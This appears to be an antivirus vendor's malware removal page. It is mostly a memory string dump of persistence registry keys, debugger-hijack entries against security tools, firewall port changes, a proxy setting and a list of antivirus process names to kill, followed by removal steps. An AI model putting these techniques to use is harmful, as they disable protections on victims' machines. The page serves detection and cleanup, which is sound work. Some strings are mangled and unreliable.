%WINDOWS%\New WinRAR archive.cab
%WINDOWS%\mario675.cab
%WINDOWS%\kavSetupEng3857.cab
%WINDOWS%\fh_antivirussetup6534.cab
%WINDOWS%\CyberWar.cab
%WINDOWS%\K.Backup
HKEY_LOCAL_MACHINE\SOFTWARE\rising
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
\srvany.exe
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot
%WINDOWS%\ShellNew
bron.tok
HKEY_LOCAL_MACHINE\Software\Classes\MIDfile\shell\play\command
HKEY_LOCAL_MACHINE\Software\Classes\txtfile\shell\open\command
%WINDOWS%\system\explorer.exe
%WINDOWS%\system\fndfst32.exe
%WINDOWS%\system\applets.exe
%WINDOWS%\system\mplayerw.exe
%WINDOWS%\system\Sysexp32.exe
%WINDOWS%\Help\intret.cnt
%WINDOWS%\Syssrc32.exe
HKEY_LOCAL_MACHINE\SOFTWARE\
XX--XX--XX.txt
UuU.uUu
XxX.xXx
index.exe
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{NH8ONC0M-V2S2-AQ8L-8OGF-WNY1SA685WDT}
HKEY_CURRENT_USER\SOFTWARE\E&BA09AZL
%TEMP%\0sexy.jpg.exe
%TEMP%\0sexy.jpg
%APPDATA%\Microsoft\Windows\E&bA09AzL.cfg
%APPDATA%\Microsoft\Windows\E&bA09AzL.dat
%SYSTEM%\zlib.dll
%SYSTEM%\tcphost.tmp
%SYSTEM%\tcphost.ini
HKEY_CURRENT_USER\SOFTWARE\oSTDyTHg
%LOCAL_SETTINGS%\Temp\aviso.bak
HKEY_CURRENT_USER\SOFTWARE\gjm4Yw1WM
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5S15K25F-2471-O311-2B56-1HL8G5821ACD}
HKEY_CURRENT_USER\Software\Classes\VirtualStore\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{5S15K25F-2471-O311-2B56-1HL8G5821ACD}
%WINDOWS%\832images.jpg.exe
%TEMP%\832images.jpg
%WINDOWS%\832images.jpg
%APPDATA%\Microsoft\Windows\gjm4Yw1WM.cfg
%APPDATA%\Microsoft\Windows\gjm4Yw1WM.dat
\%SYSTEM%\lncom_.jpg
%WINDOWS%\ktd32.atm
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srservice
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sr\Parameters
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432node\Microsoft\Windows NT\CurrentVersion\Winlogon
DirectX For Microsoft Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
HKCU\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag
%WINDOWS%\system\
%SYSTEM%\
sservice.exe
reginv.dll
fservice.exe
winkey.dll
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432node\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432node\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
%LOCAL_SETTINGS%\TEMP\w5vpouUpqc.txt
%LOCAL_SETTINGS%\TEMP\wboy.txt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{22d7f312-b0f6-11d2-94ab-0080c33c7e95}
HKEY_LOCAL_MACHINE\SOFTWARE\Google\SpoolCDS
HKEY_LOCAL_MACHINE\SOFTWARE\Adobe\CommonFiles
Software\Mozilla\Firefox
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}
\Documents\ntuser{4CB43D7F-7EEE-4906-8698-60DA70737200}.pol
%COMMON_DESKTOPDIRECTORY%
%SYSTEM%\SourceSystem
%SYSTEM%\SourceSystem\logs.dat
MozillaUpdate
%SYSTEM%\SourceSystem\Syscheck.exe
Microsoft Windows
%APPDATA%\svchost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\
MSDCSC\msdcsc.exe
\```````````````````````````.JPG
\```````.JPG
userinit.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_CURRENT_USER\Software\DC3_FEXEC
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
%APPDATA%\system32\system.exe
%SYSTEMROOT%\SysWoW64\system32\system.exe
%SYSTEMROOT%\system32\system32\system.exe
Microsoft\lsass.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
\HKCU\Software\WOW6432node\Microsoft\Windows\CurrentVersion\Run
%WINDOWS%\
%WINDOWS%\SYSWOW64\
setup.ini
winhelp.ini
winhelp.exe
regsvr.exe
rundll.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\singaraja eto les lubi sebua polnostu
%Program Files%\sri teplim kalom\singaraja eto les\sobaki_ya_edu_vas_ebat.yahaha
%Program Files%\sri teplim kalom\singaraja eto les\sleep_my_darling_sleppp.vbs
%Program Files%\sri teplim kalom\singaraja eto les\sleep_my_darling_sleppp.lll
%Program Files%\sri teplim kalom\singaraja eto les\net_v_zizni_nehera_etogo_kak_ego_o_stastia.jog
%Program Files%\sri teplim kalom\singaraja eto les\Uninstall.ini
%Program Files%\sri teplim kalom\singaraja eto les\Uninstall.exe
HKCU\Software\WOW6432node\Microsoft\Windows\CurrentVersion\Run
msdcsc.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{4JFT3224-0O8K-7ONV-CHFJ-5U18T0P61VRW}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{4JFT3224-0O8K-7ONV-CHFJ-5U18T0P61VRW}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{TML0304K-328R-7856-T8O1-V57227U3M100}
Software\Microsoft\Active Setup\Installed Components\{TML0304K-328R-7856-T8O1-V57227U3M100}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{TML0304K-328R-7856-T8O1-V57227U3M100}
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{TML0304K-328R-7856-T8O1-V57227U3M100}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows
\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wuauserv
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\luafv
\HKCU\Software\Microsoft\Windows\CurrentVersion\Run
32.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus
HKCU\Software\Policies\Microsoft\Windows\System
HKCU\Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\sr
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\piffile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile
IsShortcut
HKLM\System\CurrentControlSet\Control\Session Manager\AppCertDlls
asr_skey
%SYSTEM%\findsink.dll
%SYSTEM%\mqsvgsvc.dll
%SYSTEM%\cmdlvert.dll
\HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
.tmp.exe
%WINDOWS%\system64
Windows
HKEY_LOCAL_MACHINE\SYSTEM\Select
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet00X\Control\Session Manager\SubSystems
Windows Defender\
%APPDATA%\postclean.bat
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
winhlp32.exe
twunk_32.exe
%Documents and Settings%\Administrator\Desktop\DisplaySwitch.exe
mdcsc.exe
HKCU\Software\DC3_FEXEC
ÞSKTOPDIRECTORY%\Internet Security PRO.lnk
HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
\HKLM\System\CurrentControlSet\Services\Tcpip\Parameters
MaxUserPort
{310DE29C-0AD3-4A43-A2DB-221F1160CACB}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\wlogon
HKCU\Software\Microsoft\Internet Explorer\New Windows
HKCU\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths
WindowsStart
taskhost.exe
\HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CLASSES_ROOT\S7.Document\shell\printto\command
HKEY_CLASSES_ROOT\S7.Document\shell\print\command
HKEY_CLASSES_ROOT\S7.Document\shell\open\command
HKEY_CLASSES_ROOT\S7.Document\DefaultIcon
%COMMON_APPDATA%\Dirty
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system
216.146.36.240
216.146.35.240
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
3838:TCP
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\
4421:UDP
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List
\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
\??\%System%\hide.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ialdnwxf\
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ialdnwxf\Security\
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ialdnwxf\Enum\
HKEY_CLASSES_ROOT\comfile\shell\open\command
rund1132.exe %1
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon
{EA6F9A77-5617-406E-AAFA-D7C897C38BA7}
{581907C4-33B7-439A-85BA-3DB34D65D3CD}
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
C:\CMPSUCCESS
%SystemRoot%\system32\wbem\WMIsvc.dll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmgmt\Parameters
%LOCAL_APPDATA%\Temp\TarFA22.tmp
%LOCAL_APPDATA%\Temp\TarE7F0.tmp
%LOCAL_APPDATA%\Temp\TarE7DF.tmp
%LOCAL_APPDATA%\Temp\CabFA21.tmp
%LOCAL_APPDATA%\Temp\CabE7EF.tmp
%LOCAL_APPDATA%\Temp\CabE7DE.tmp
\svchost.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MpsSvc
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system
TcpMaxHalfOpen
HKEY_LOCAL_MACHINE\ControlSet001\Services\Tcpip\Parameters\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
%Program Files%\Common Files\lsass.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
%SystemDrive%
%DOWNLOAD_PROGRAM_FILES%
úVORITES%
%SYSTEMROOT%
%SYSTEMDIRECTORY%
%STARTUP%
%STARTMENU%
%USERPROFILE%
ÞSKTOPDIRECTORY%
%COOKIES%
%COMMON_STARTUP%
%COMMON_FAVORITES%
%COMMON_STARTMENU%
%COMMON_PROGRAMS%
%COMMMON_ALTSTARTUP%
%WINDOWS%\system32\userinit.exe
rHKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessManager.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\boot.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\auto.exe
HKEY_CLASSES_ROOT\exefile
HKLM\Software\{5AFD725B-CB98-3C32-ADDC-1F6713561294}
HKCU\Software\{5AFD725B-CB98-3C32-ADDC-1F6713561294}
ÞSKTOPDIRECTORY%\pQAbGYBP.zip
\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Microsoft\Windows NT\CurrentVersion\Windows
Microsoft\Windows NT\CurrentVersion\Winlogon
Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Microsoft\Windows\CurrentVersion\Run
Microsoft\Windows\CurrentVersion\RunOnce
HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
%APPDATA%\Sample.lnk
PENDINGFILERENAMEOPERATIONS
u%system%\drivers\etc\hosts
\Uninstall.ini
\Uninstall.exe
\mirniatom.bat
\iosdbfvadj.jka
\alkoid.vbs
System32\DRIVERS\asyncmac.sys
HKEY_CURRENT_USER\Software\Microsoft\DeviceControl
PendingFileRenameOperations
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager
%SYSTEM%\user32.dll
%SYSTEM%\user32.vxe
\AutoConfigURL
HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
rHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION
%APPDATA%\restore.ini
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
zlclient.exe
wireshark.exe
winmgr.exe
spybotsd.exe
SBPIMSvc.exe
sbamui.exe
SBAMTray.exe
SBAMSvc.exe
rstrui.exe
msseces.exe
MsMpEng.exe
MSASCui.exe
MpCmdRun.exe
mbamservice.exe
mbamscheduler.exe
mbampt.exe
mbamgui.exe
mbam.exe
Mantle.exe
lnssatt.exe
keyscrambler.exe
instup.exe
hijackthis.exe
egui.exe
ComboFix.exe
ccuac.exe
bdagent.exe
avscan.exe
avp.exe
avgwdsvc.exe
avgui.exe
avguard.exe
avgrsx.exe
avgnt.exe
avgidsagent.exe
avgcsrvx.exe
avconfig.exe
avcenter.exe
AvastUI.exe
AvastSvc.exe
Windows Live
WindowsUpdate
HKCU\Software\Microsoft\Windows\CurrentVersion\ime
\HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION
\HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
01000000
HKEY_CURRENT_USER\Software\
\HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
C:\Windows\InstallDir\help.exe
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
{FD38A8A8-5C04-44A4-8C9B-D51223EF50F8}
HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\MICROSOFT\WINDOWS DEFENDER\MP SCHEDULED SCAN
6040515
6816302
C:\USERS\TAUSER\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\SECURITY TOOL.LNK
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{F835BF8E-6878-4F76-A634-5A258533E717}\{8B98EAC1-8153-42F5-BEF9-3814AA8233F4}
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{AED7EE88-954D-420E-A01F-44BDFF4B8E8A}\{B1CC4B02-3772-4C36-AD98-6926DE9C6E2E}
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{AED7EE88-954D-420E-A01F-44BDFF4B8E8A}
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{A9840446-BEF8-4616-B901-49964C4E3DF7}\{8B98EAC1-8153-42F5-BEF9-3814AA8233F4}
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{A9840446-BEF8-4616-B901-49964C4E3DF7}
HKCU\SOFTWARE\MICROSOFT\MEDIAPLAYER\HEALTH\{B1E5ABB6-6F14-41F6-AEA2-BF537406A4B6}
HKCU\SOFTWARE\MICROSOFT\MEDIAPLAYER\HEALTH\{91899B3D-A02F-4D78-B90E-40BBB59E4A2D}
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{BF7E0C08-D53E-46EB-A653-B53C167582F4}\{BD7663B9-926E-4E94-B6BA-F222D979B734}
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{BF7E0C08-D53E-46EB-A653-B53C167582F4}
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{A771865F-3BF1-43CD-8F63-07035ACEAFFE}\{D78FE903-1652-4F28-A4CD-EB8704749713}
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{A771865F-3BF1-43CD-8F63-07035ACEAFFE}
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{3FCF9120-D0DD-4AA2-946F-F99DC6FCEA29}\{D78FE903-1652-4F28-A4CD-EB8704749713}
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{3FCF9120-D0DD-4AA2-946F-F99DC6FCEA29}\{BD7663B9-926E-4E94-B6BA-F222D979B734}
HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTPAGE\NEWSHORTCUTS
HKCU\SOFTWARE\MICROSOFT\MEDIAPLAYER\HEALTH\{555660CB-2037-4BE0-AAAA-ADB09BB0DFE6}
HKCU\SOFTWARE\MICROSOFT\MEDIAPLAYER\HEALTH\{2208559D-C10C-4288-9048-B27B5E72746C}
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{F835BF8E-6878-4F76-A634-5A258533E717}\{B1CC4B02-3772-4C36-AD98-6926DE9C6E2E}
%LOCAL_APPDATA%\TEMP\5440629.BAT
%LOCAL_APPDATA%\TEMP\86283760.BAT
%PROFILE%\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\SECURITY TOOL.LNK
\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKCU\S-1-5-21-1921027029-3133593505-18383363-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
%STARTMENU%\PROGRAMS\STARTUP\SYSTEM CHECK.LNK
Original Size: %d
c%WINDOWS%\SBS_wininit.vxe
%SYSTEM%\wininit.exe
%WINDOWS%\SBS_explorer.vxe
%WINDOWS%\explorer.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\wmicucltsvc
%WINDOWS%\SBS_wininit.vxe
%WINDOWS%\SBS_winlogon.vxe
%SYSTEM%\winlogon.exe
YZH.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
%SYSTEM%\Drivers\VDWFP.sys
%SYSTEM%\Drivers\VDWFP64.sys
%Program_Files%\Lenovo\VisualDiscovery\VisualDiscovery.tlb
%Program_Files%\Lenovo\VisualDiscovery\VisualDiscovery.exe
%Program_Files%\Lenovo\VisualDiscovery\VDWFPInstaller.exe
%Program_Files%\Lenovo\VisualDiscovery\VDWFP64.sys
%Program_Files%\Lenovo\VisualDiscovery\VDWFP.sys
%Program_Files%\Lenovo\VisualDiscovery\uninstall.exe
%Program_Files%\Lenovo\VisualDiscovery\SuperfishCert.dll
%Program_Files%\Lenovo\VisualDiscovery\ssl3.dll
%Program_Files%\Lenovo\VisualDiscovery\sqlite3.dll
%Program_Files%\Lenovo\VisualDiscovery\softokn3.dll
%Program_Files%\Lenovo\VisualDiscovery\smime3.dll
%Program_Files%\Lenovo\VisualDiscovery\Run.exe
%Program_Files%\Lenovo\VisualDiscovery\nssutil3.dll
%Program_Files%\Lenovo\VisualDiscovery\nssdbm3.dll
%Program_Files%\Lenovo\VisualDiscovery\nssckbi.dll
%Program_Files%\Lenovo\VisualDiscovery\nss3.dll
%Program_Files%\Lenovo\VisualDiscovery\libplds4.dll
%Program_Files%\Lenovo\VisualDiscovery\libplc4.dll
%Program_Files%\Lenovo\VisualDiscovery\libnspr4.dll
%Program_Files%\Lenovo\VisualDiscovery\freebl3.dll
HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\C864484869D41D2B0D32319C5A62F9315AAF2CBD
\Software\Microsoft\Windows\CurrentVersion\Internet Settings
http=127.0.0.1:5555
HKEY_LOCAL_MACHINE\Software\avsuite
HKEY_CURRENT_USER\Software\avsuite
HKEY_LOCAL_MACHINE\Software\AvScan
HKEY_CURRENT_USER\Software\AvScan
HKEY_LOCAL_MACHINE\Software\avsoft
HKEY_CURRENT_USER\Software\avsoft
HKEY_CURRENT_USER\Software\Microsoft\Windows Script\Settings
.pptx
.xlsx
.docx

SBAMSvc.exe_3448_rwx_2F60A000_00060000:

Vh%cQ


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    SBSetupDrivers.exe:3152
    SBSetupDrivers.exe:1812
    %original file name%.exe:1912
    runonce.exe:3092
    runonce.exe:2736
    GFI.Tools.Run64.exe:1928
    DrvInst.exe:2212
    DrvInst.exe:1680
    STOPzilla.exe:3836
    RUNDLL32.exe:3528
    regsvr32.exe:3500
    regsvr32.exe:1496
    SZNetAssistant.exe:3916
    mobsync.exe:3264
    SZServer.exe:3384
    SZServer.exe:992
    SZWSC.exe:3788
    SZWSC.exe:2612
    MsiExec.exe:2456
    MsiExec.exe:2624

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Windows\System32\drivers\sbwtis.sys (90 bytes)
    %Program Files% (x86)\STOPzilla\Drivers\amd64\wnet\SbFwIm.sys (122 bytes)
    %Program Files% (x86)\STOPzilla\Drivers\amd64\sbapifs.sys (90 bytes)
    %Program Files% (x86)\STOPzilla\Drivers\amd64\wlh\sbhips.sys (65 bytes)
    C:\Windows\System32\drivers\sbhips.sys (65 bytes)
    %Program Files% (x86)\STOPzilla\Drivers\amd64\wlh\SBWTIS.sys (90 bytes)
    %Program Files% (x86)\STOPzilla\Drivers\amd64\wlh\sbfw.sys (262 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\DRVSetup\SetupDrv.log (17489 bytes)
    C:\Windows\System32\drivers\sbapifs.sys (90 bytes)
    C:\Windows\System32\drivers\SbFw.sys (1543 bytes)
    C:\Windows\System32\drivers\SETEAAC.tmp (601 bytes)
    C:\Windows\System32\drivers\SbFwIm.sys (601 bytes)
    C:\Windows\System32\DriverStore\infpub.dat (496 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{332d6cab-08ae-5fa0-2478-ed478992213a}\SETDB51.tmp (3 bytes)
    C:\Windows\System32\config\SYSTEM (6769 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{6b8be61a-1242-088c-2864-a834156d4a47}\SETDDB5.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{6b8be61a-1242-088c-2864-a834156d4a47}\SETDDB4.tmp (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{332d6cab-08ae-5fa0-2478-ed478992213a}\SETDB31.tmp (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{332d6cab-08ae-5fa0-2478-ed478992213a}\amd64\wnet\SETDB62.tmp (601 bytes)
    C:\Windows\System32\DriverStore\infstrng.dat (1764 bytes)
    C:\Windows\System32\config\SYSTEM.LOG1 (9355 bytes)
    C:\Windows\System32\catroot2\dberr.txt (1248 bytes)
    C:\$Directory (768 bytes)
    C:\Windows\inf\oem13.PNF (8464 bytes)
    C:\Windows\inf\oem14.PNF (4811 bytes)
    C:\Windows\System32\drivers\SETED8A.tmp (601 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\elf_hash.dat (5280 bytes)
    C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\a81bb17e1f5dc49a730b06b63f6d28e9_c0322acd-5e5d-42f0-b163-c591ee6ff5b9 (61 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\libNSIS.dll (3729 bytes)
    C:\ProgramData\STOPzilla!\Events\EV2015042504170900.xml (414 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\ih.vdx (1425 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\EPSigs.vdx (65 bytes)
    C:\ProgramData\STOPzilla!\ThreatNetConfig.xml (810 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\mime0.std (260 bytes)
